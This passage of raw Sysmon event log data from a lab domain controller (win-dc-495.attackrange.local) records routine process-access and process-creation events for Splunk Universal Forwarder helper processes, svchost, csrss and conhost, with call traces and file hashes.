Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-901C-6005-0C01-00000000A301}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-901C-6005-0C01-00000000A301}2936C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-901C-6005-0C01-00000000A301}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.036{59A5CD1D-901C-6005-0C01-00000000A301}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-901D-6005-0E01-00000000A301}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-901D-6005-0E01-00000000A301}1040C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-901D-6005-0E01-00000000A301}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:49.958{59A5CD1D-901D-6005-0E01-00000000A301}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
